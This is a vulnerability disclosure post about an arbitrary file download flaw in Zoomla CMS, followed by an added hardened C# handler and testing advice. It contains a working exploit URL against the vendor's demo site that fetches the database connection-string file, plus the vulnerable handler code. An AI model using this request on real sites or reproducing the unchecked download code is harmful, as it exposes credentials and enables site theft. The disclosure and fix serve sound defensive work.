
Zoomla CMS arbitrary file download

2014-11-01 14:35

So far I have tested the latest Zoomla CMS2 x2.0 and it works; the DEMO on the official site works too.

Config/ConnectionStrings.config is the database connection file. Of course, the whole site can be downloaded; just change the path.

http://demo.zoomla.cn/user/iServer/FiServerInfo.aspx?menu=filedown&filepath=//Config//ConnectionStrings.config

Referer:

http://demo.zoomla.cn/user/iServer/FiServer.aspx

[Screenshot: zoomla.PNG]

Proof of vulnerability:

The Page_Load function behind FiServerInfo.aspx does not restrict the requested path to any allowed range, so the entire site can be downloaded.



protected void Page_Load(object sender, EventArgs e)
{
    // Download branch: triggered by ?menu=filedown
    if (!string.IsNullOrEmpty(base.Request.QueryString["menu"]) && (base.Request.QueryString["menu"] == "filedown"))
    {
        // filepath is taken straight from the query string
        string path = base.Request.QueryString["filepath"];
        if (path != "")
        {
            // MapPath resolves any virtual path under the site root; nothing
            // confines it to an upload directory or checks the caller's rights
            FileInfo info = new FileInfo(base.Server.MapPath(path));
            if (info.Exists)
            {
                base.Response.Clear();
                base.Response.AddHeader("Content-Disposition", "attachment; filename=" + base.Server.UrlEncode(info.Name));
                base.Response.AddHeader("Content-Length", info.Length.ToString());
                base.Response.ContentType = "application/octet-stream";
                base.Response.Filter.Close();
                // Any existing file, including Config/ConnectionStrings.config, is written to the response
                base.Response.WriteFile(info.FullName);
                base.Response.End();
            }
            else
            {
                base.Response.Write("<script>alert('该文件不存在!');history.go(-1);</script>");
            }
        }
    }
    // Normal page rendering when not a download request
    if (!base.IsPostBack)
    {
        int questionId = DataConverter.CLng(base.Request.QueryString["QuestionId"]);
        this.MyBind(questionId);
        this.spfiletype.InnerHtml = SiteConfig.SiteOption.UploadFileExts;
    }
}
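For comparison, here is a hardened version of the same handler. This is an added example written for this page, not Zoomla's own code: it assumes a dedicated download directory (the "~/DownloadRoot/" name is a placeholder) and uses the standard ASP.NET Page.User.Identity.IsAuthenticated check as a stand-in for the product's real session and role logic. The two fixes the original lacks are an authorisation check before any file is touched, and canonicalising the requested path so that it must resolve inside the download root; a request such as //Config//ConnectionStrings.config is rooted and so falls outside that root and is refused.

```csharp
using System;
using System.IO;
using System.Web;
using System.Web.UI;

// Added example (not Zoomla's code). The download root and the
// authentication check are assumed placeholders for the product's own values.
public partial class FiServerInfoHardened : Page
{
    private const string DownloadRootVirtual = "~/DownloadRoot/";

    // Resolves a user-supplied relative path against the physical download
    // root. Returns the absolute path, or null if the request escapes the root.
    public static string ResolveWithinRoot(string rootPhysical, string requested)
    {
        if (string.IsNullOrEmpty(requested))
            return null;

        // Rooted paths ("/x", "\\x", "C:\x") and drive/stream separators are
        // never legitimate here, so reject them before any resolution.
        if (Path.IsPathRooted(requested) || requested.Contains(":"))
            return null;

        try
        {
            // Canonicalise both sides so "..", "." and doubled separators collapse.
            // The trailing separator on root stops "DownloadRootEvil" matching "DownloadRoot".
            string root = Path.GetFullPath(rootPhysical)
                .TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;
            string full = Path.GetFullPath(Path.Combine(root, requested));

            if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase))
                return null;

            return full;
        }
        catch (ArgumentException)
        {
            // Invalid characters in the requested name: treat as not found.
            return null;
        }
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        if (Request.QueryString["menu"] != "filedown")
            return;

        // Authorise first. The original handler served files to anyone;
        // replace this placeholder with the product's own permission check.
        if (!User.Identity.IsAuthenticated)
        {
            Response.StatusCode = 403;
            Response.End();
            return;
        }

        string rootPhysical = Server.MapPath(DownloadRootVirtual);
        string full = ResolveWithinRoot(rootPhysical, Request.QueryString["filepath"]);

        // One generic response for "outside root" and "missing" avoids
        // confirming which files exist elsewhere on disk.
        if (full == null || !File.Exists(full))
        {
            Response.StatusCode = 404;
            Response.End();
            return;
        }

        Response.Clear();
        Response.ContentType = "application/octet-stream";
        Response.AddHeader("Content-Disposition",
            "attachment; filename=\"" + Server.UrlEncode(Path.GetFileName(full)) + "\"");
        Response.TransmitFile(full);
        Response.End();
    }
}
```

ResolveWithinRoot is kept static and side-effect free so it can be unit-tested with a temporary directory: inputs like "report.pdf" resolve, while "../Config/ConnectionStrings.config", "//Config//ConnectionStrings.config" and "C:\\anything" all return null. Logging the refused requests gives a simple detection signal for path-traversal probing against this endpoint.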



Source: www.2cto.com/Article/201411/348060.html
